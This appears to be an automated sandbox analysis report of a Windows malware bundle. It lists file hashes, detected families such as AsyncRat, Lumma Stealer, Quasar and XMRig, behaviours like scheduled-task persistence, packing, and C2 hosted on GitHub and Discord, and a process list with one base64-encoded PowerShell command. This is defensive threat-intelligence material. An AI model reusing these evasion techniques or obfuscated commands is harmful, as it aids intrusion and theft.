| SHA256 | 570eb25bf2dfa26b5ffb7b42251232ab47defdf2117020b144f8ba40f884edfd |
| SHA512 | 2fb72a05311c4fcc7db660e1120d6715dd6583ee3d2ec5d2f14ba8a39c4a163f258d2080edaa94c2811f7502f78324a1b27eb969fe12789a01f1cbbed2678e54 |
C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
| MD5 | d93c9f26b0d69dd22cdbc76e3cfea0e5 |
| SHA1 | 2f80c7f17fae6f27cc8e53d2c29a204137cd8125 |
| SHA256 | e57f307bee3c0b72d9f62f09567ed298041171828fa2993bff97cd1a5780b488 |
| SHA512 | 677ad407ce4b2779d1ff54a97643a9dfaff46ebf848cee6561c22e89f94af1bab03f1e3f93f1852260eb457ca276c15e7ea790d9dfeb55980b2a7b70fb78c7f0 |
C:\Users\Admin\AppData\Local\Temp\a\si.exe
| MD5 | fa21bcb264226c07d923d31a1642af8d |
| SHA1 | 4bda85546017addd5943f924e1ab34b3729408a1 |
| SHA256 | b662b694630f0b54c92dc2567e00390492d90d6cea5a50efc231e8b4b227ec69 |
| SHA512 | 4f041dbb346d69e4f79fc450a192e67833dbb4d035ac48b3eed614bfce8d19bd9fa020a9331cf38eca4f6ad0c40623daf38427584cc5d791e697d1953f5ea90a |
C:\Users\Admin\AppData\Local\Temp\tMW2bKedNgAo.bat
| MD5 | c291afecb4acf0510a6ccc9efaf9028e |
| SHA1 | 4f69daab53cdd257d23234c07c7f11acd647df49 |
| SHA256 | bab18fab7f1e8434cb4a38ba5c98a6ece90446f699d30950a7e56c5273b45f26 |
| SHA512 | 440c3dc765d15fc2fb82f32d7dab3746efeef67725aa8a929ac9566a286c0c9648aa126cbddfa80451ea8a8b212c142c5fd2d764d79b2b9fec213d7cb23a2a09 |
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_5900\banner.jpg
| MD5 | daf14d3480c7aa73a53415ff483b10a1 |
| SHA1 | db240a22410ac7536f5c833ca98322cca4180c3d |
| SHA256 | 0d2715e6689ea0cccc6cdfad328dab66f61df466fbbaf043cef2d05f9ad420c4 |
| SHA512 | 7741a04025317179eaf14f7843f313f0e8922fd219c1d45db91e65e58229a1c948fb12120806507162d064b03dd4a45a8380210545a8a61910e622f0b3c736c7 |
C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe
| MD5 | 2ec8645293b148428a3ea4e8ab1f417f |
| SHA1 | a596627d15e69408a1c5f0eb494cd309d2985f97 |
| SHA256 | 22006b2702d76d4d21b0b78b10bd9e0dc69a6b365cd741c346c30ad5b257877c |
| SHA512 | ac3e4f29244ec81f8eab6b76c6a480013d291500f4494e956025709bcd55d170ff15c9c5f63b48cd824beff6e27afce3bf002bb80aa6d1a0d2bbd2a2afe4c551 |
C:\Users\Admin\AppData\Local\Temp\E8087F00
| MD5 | f8e69a6262c6a3e4edb23e8daf0d1e40 |
| SHA1 | eff7d6f9c6ac4b88fc12940111d3aea35e2e0193 |
| SHA256 | 244eae9bee586d6717ade4e2cbb8e52ad7942081c292d0142c688de5b65337f7 |
| SHA512 | 1440ce490d1092c8724492ac1c3e325c7dc8b977ea111aa90c3d5ffb6f6d10fef5925055b126a7b2d2062a302b83561afc7b9f403036db033b8eab367255a8d2 |
C:\ProgramData\mddjpug\llxax.exe
| MD5 | 168e78a7154b2453627f5ca82e9ccced |
| SHA1 | 2a1b4df3e681f1b401c1d704351817e4642b8692 |
| SHA256 | d311d65ddc8477c84bd77baa9606980515962231ea048e6c65d3d9b1bc527464 |
| SHA512 | 11d48effa4cf685fd12836222fd0e09d5f7be96b077d0292521e6341f1287b95fa7db5f94b2528bd83f0d7eff1a6c8ccff7270e3cd1fad1625b6c9040394e346 |
C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe
| MD5 | 99116c11d6d25eea78570c9bf70bcaf6 |
| SHA1 | 9dab1eb2af23d8262bf73ad6b9a96675957fb0c0 |
| SHA256 | b7169a7f0ca94554c2fbc5daee887dc1fc2c9892b6154ecc89a84eb0726fa9ea |
| SHA512 | 24270cdb1063f9074497d230bc90663e558ba564ab3d155a59872c7628b8ccbedf76d90b5a4077035ed19e329bb1e56de1f3bb193569a656aa2be8b01b1c5e76 |
C:\Users\Admin\AppData\Local\Temp\YGXzzv5P.xlsm
| MD5 | 8fa875842c67867ead553327c53906fb |
| SHA1 | 2e9cd6e6202f80b1d7a50f80bce9f3177bda2558 |
| SHA256 | 8485ff49ec9f2027bfc74a1f3dc3a27b6b3095954fec858c7545afdca52a0cc7 |
| SHA512 | 040d9ea596e8b3c2f067e1b3fd96e2adc4cf8e44b2b83981664ba378b31e0d60c6115e0b338f6b8f9207a97af0f540dc80aba28fe21bace2f172c0e75cf9009f |
C:\Users\Admin\AppData\Local\Temp\HwVC8YbyZUv4.bat
| MD5 | 8547e23859c78dc59e41b4fa65c7e205 |
| SHA1 | a318f2847f7cdb62f8cae364f6d6d79d890bea7e |
| SHA256 | 51528aabe2678630ca54b00c7472267e31b7ccd38b753fbc173144502ce004f5 |
| SHA512 | d8c483b7a7ff0782777a1e232acadfb018067c52b5698c46af97c9a7d29993b618785fea697bdff0e64a1f186c6439e9bd69559594248483991e89476b9361c5 |
C:\Users\Admin\AppData\Local\Temp\~$YGXzzv5P.xlsm
| MD5 | ff09371174f7c701e75f357a187c06e8 |
| SHA1 | 57f9a638fd652922d7eb23236c80055a91724503 |
| SHA256 | e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8 |
| SHA512 | e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\01LB6K3J\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe
| MD5 | 96fa728730da64d7d6049c305c40232c |
| SHA1 | 3fd03c4f32e3f9dbcc617507a7a842afb668c4de |
| SHA256 | 28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93 |
| SHA512 | c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe |
C:\Users\Admin:.repos
| MD5 | 683fd308c8d6f91a1cd5766d82cb81b3 |
| SHA1 | 29053b19a82c97633367c13b34d86b3361aac469 |
| SHA256 | 7c8d35befaf8af9277d9a6406ad9fb500d8303899f1414efa08cbaeae96c02c5 |
| SHA512 | 1d698214bb95b15205b91fa9469b96e26ba43de563651d220516c8707eb0729eae36730c91899224088f2fb47d2177e4627cc2ccf8947b64a0eea9ec8924516b |
C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe
| MD5 | a38b838486743b7473b4e993ef6f7895 |
| SHA1 | db8b711f84ea5610b1f3a00c83827c0226b372c9 |
| SHA256 | 843b982f5fe42f642e0f7a3b1c10cddd1bc0e4072e31d6474aff430ef7977960 |
| SHA512 | f38b6fe2e2cda920904e553984298066b24411edaab4f8c7388f24bb590044e08967283910dbe063a56c784c26f7ef580f85d496880c5ed9cb98b4850e968da1 |
C:\Users\Admin\AppData\Local\Temp\Ex5IpiVxYQUw.bat
| MD5 | 8be2ee4417fc3cd78efd2ce549cfe91a |
| SHA1 | 4190f395b75c4e8062dacf18c8b5fafdb4c350f0 |
| SHA256 | e6e2d8d262c697b25095e519f424bc0c88685e5650be6fb2986b6b40f8bb8724 |
| SHA512 | 6bb49ad306920bae1eb2f958318c2c44c06baf1bd242a0f70c0cfc61c8e786fe7804b83eace8d5b00c47e50bbba49c38e1368ce2c4f853aa5987e854012163c1 |
C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe
| MD5 | 2cdb4554508d15cae8476de2ab840e12 |
| SHA1 | b012f730fbea610e319e8e8afb51299dfaeb650b |
| SHA256 | 1fd352ea58c0629472f65de13e74969858770dffa07784998fd0611007b6751d |
| SHA512 | 7a11105a5772c97e5a5edfc08d8861d073d2ee339116d74e8cac0ead3a53c22fac1c8c063cc4b468093cc5ac8190d5cc543fa068ab5ea43ee4f116a43dc0786a |
C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe
| MD5 | 1dfecd13c3d1c21e4f33694f13df02fb |
| SHA1 | 6d9d48568847a8bcf9d7ed2e040cdf76cab1e578 |
| SHA256 | 5f2f29405bb4332f6afaf99bb63b0657f42cea9a130f29f2fb0be769242c8990 |
| SHA512 | 85b8a644b3c544829e8f665b2db121446c2962611972e1e502b4570b54a321f0d0e75cc2f0c84ef9062101c28ea79effdecbf3bce7c09a60cda81418af618fe4 |
C:\Users\Admin\AppData\Local\Temp\RcofJF04iQOv.bat
| MD5 | 6a9cce314cfd46e49a94071b2a6aca9a |
| SHA1 | 7d2be92af2ecee23be5ea7eec7dbae3904d01943 |
| SHA256 | 86dbdeebc1d41d4b51390d1852b95f4986d76b4e27b6328ca525d2c6a257c8a3 |
| SHA512 | 6cc0cf8b2b9be68a45efdcde0f8c8380d98ef531e66e617042c046a7687f75320dd11f7b5b09f8ff75b373ecbedf344cebade899b288030849c2fdb168b18415 |
C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe
| MD5 | 391ff5ff27bb770f0056adc11c040eb9 |
| SHA1 | 7db794de34df45f973dffe037b396017cf0973a5 |
| SHA256 | f81997102b7615875fb4a076755887cf5c06c00645ced740d45478ad5868c8a5 |
| SHA512 | 515951f54feb2221922c0f2c9cbb9c116277e4d3ebbca99832a6cab1fb144364c5347e6c9fc660cdf837ce3d20f628c60ccc6b94ba9a4d765fe7f666be798d28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\CURRENT~RFf789ede.TMP
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\000002.dbtmp
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe
| MD5 | d0f6451e7f010c28d5542743fc0de753 |
| SHA1 | 6927dc54aaabd515ddcf8ae46899f0f5bf765025 |
| SHA256 | 249ef3138dadcbb6b56dd4dfb29a2cc4e9731867d9a187c8249a6b45b32c0692 |
| SHA512 | bf9f788bc8aa9184e0a54a42ff5934b80f84b12d2819c50c97946c9c23bb0143ad79f24d97fe65e2eda942108a445e5ec49168471989126f2de7531dceef66b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\000004.dbtmp
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000010.dbtmp
| MD5 | 60e3f691077715586b918375dd23c6b0 |
| SHA1 | 476d3eab15649c40c6aebfb6ac2366db50283d1b |
| SHA256 | e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee |
| SHA512 | d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000009.dbtmp
| MD5 | 979c29c2917bed63ccf520ece1d18cda |
| SHA1 | 65cd81cdce0be04c74222b54d0881d3fdfe4736c |
| SHA256 | b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53 |
| SHA512 | e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a |
C:\Users\Admin\AppData\Local\Temp\j309Yf3igW2C.bat
| MD5 | f09d2ed4439c18e2621e7947f06cbc45 |
| SHA1 | ebdb8d4f9403a836b3c48d611b8928caecd4b16c |
| SHA256 | 09c3c98179b189eb063c00849ae58e9704d91669e2df58e9f5cc5de75e22a8a2 |
| SHA512 | ccd78e0f729f790d3fde5792327e5de75c1d204664eaf872eaa9ec2021a74ea817ea18838c58fa2cf67da0d3559df44ad7852e70ee3034ab28ac98c3daeaf711 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\soft[1]
| MD5 | fc1e4df340c9005e05b8bfc96cec9e09 |
| SHA1 | b443e9d3d0e35f97db505025d130ccb6646cd437 |
| SHA256 | 0c68affa8190af92aac6b35099f3e67659c42f6bc854a7d764a3a448eff2cb51 |
| SHA512 | 3a1cb04272ae35edbcae5211c02eca15735f63dfe0491158aee0565f226277810923b1f1cfca30dd594d926466628315454af466230f02d0b0f5d181fa3f2101 |
C:\ProgramData\JJECAAEHCFIEBGCBGHIE
| MD5 | 32ce6268442895cf89b605141169fdce |
| SHA1 | f3d70635a73d9b5513cafd428e8cc10972048389 |
| SHA256 | e287f70336a614563f334e3d5c67a953ef2def6185e36a6b6b2215b9db24f726 |
| SHA512 | a6b9700e74f001a2e6fa629fec8d8d616e5563dce621a38a5740676dccf10f5e9367ce3ebc8274360df30de6bdd151a398ab91b407e9b1d8c04eb532ecf4be19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Local\Temp\2f6LOb1AHb4E.bat
| MD5 | 0ea1bc2839960c007fc424d239654506 |
| SHA1 | 54c0dcb5a12ddbbed9464aec3d85ae1e53d62d57 |
| SHA256 | 9e4794c1a0d7dabbe940147c84b56895bac4ad74aab6fc19cbc5661511d9778c |
| SHA512 | 2d69b1a27f1138fe18e44fbaf5a2414d1da2e72c76146dec780a4f4168f5513488bdcf4bfdeab389ed537a28c713b0ba723e0eaad248789f2451331eed67dace |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-26 02:42
Reported
2025-03-26 02:45
Platform
win10v2004-20250313-en
Max time kernel
1s
Max time network
155s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
CrimsonRAT main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
CrimsonRat
Crimsonrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lokibot
Lokibot family
Lumma Stealer, LummaC
Lumma family
ModiLoader, DBatLoader
Modiloader family
Phemedrone
Phemedrone family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sality
Sality family
Sharp Stealer
Sharpstealer family
SilverRat
Silverrat family
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xworm
Xworm family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ModiLoader First Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
"C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
"C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
"C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
"C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
"C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
"C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
"C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
C:\Users\Admin\AppData\Roaming\Installer.exe
"C:\Users\Admin\AppData\Roaming\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
"C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
"C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
C:\Users\Admin\AppData\Local\Temp\proxyt.exe
"C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
